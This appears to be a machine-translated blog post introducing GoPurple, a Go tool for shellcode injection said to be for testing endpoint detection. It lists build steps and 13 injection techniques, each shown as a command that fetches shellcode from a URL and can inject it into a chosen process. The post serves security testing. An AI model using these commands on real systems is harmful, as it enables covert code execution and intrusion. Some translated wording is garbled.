GoPurple: Shell code injection techniques

GoPurple is a simple various shell codes techniques, aimed at streamlining the evaluation process for endpoint detection, but also a challenge to enter the world of Golang.

Installation

git clone https://github.com/sh4hin/GoPurple.git

cd GoPurple

go build gopurple.go

Use

-a string
Program case
-b string
block DLL mode (nonms / onlystore for QueueUserAPC)
-p int
Process ID to inject shellcode into
-prog string
program to inject into
-t string
shellcode injection technique to use:
1: CreateFiber
2: syscall
3: CreateThreadNative
4: CreateProcess
5: EtwpCreateEtwThread
6: CreateRemoteThread
7: RtlCreateUserThread
8: CreateThread
9: CreateRemoteThreadNative
10: CreateProcessWithPipe
11: QueueUserAPC
12: CreateThreadpoolWaitpool
13: BananaPhone
-u string
URL hosting the shellcode

Betting

1 - gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)

2 - gopurple.exe -u urlhostingpayload -t 2 (Syscall)

3 - gopurple.exe -u urlhostingpayload -t 3 (CreatetThreadNative)

4 - gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)

5 - gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)

6 - gopurple.exe -u urlhostingpayload -t 6 -p tagetprocess (CreateRemoteThread)

7 - gopurple.exe -u urlhostingpayload -t 7 -p tagetprocess (RtlCreateUserThread)

8 - gopurple.exe -u urlhostingpayload -t 8 // (CreateThread)

9 - gopurple.exe -u urlhostingpayload -t 9 -p tagetprocess (CreateRemoteThreadNative)

10 - gopurple.exe -u urlhostingpayload -t 10 -prog porgram -a processargument (ex: C: \ Windows \ System32 \ WindowsPowerShell \ v1.0) and processargument (ex: Get-Process) (CreateProcessWithPipe)

11 - gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll (nonms or onlystore) (QueueUserAPC)

nonms = only DLLs that are signed by Microsoft can hook into the process

onlystore = only Microsoft store 's process can hook into the process

12 - gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWaitpool)

13 - gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)

Application snapshots

You can download the program from here.

iGuRu.gr The Best Technology Site in Greecefgns

Subscribe to Blog via

Subscribe to this blog and receive of new posts by email.

applicationblockbuildCDclonesqueuescommandDLLEXEGogithubGOhookhostinghttpsIDInjectableinjectionlineMicrosoftMicrosoft StoreFashionpointto processprogramshellstoreURLwindows

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).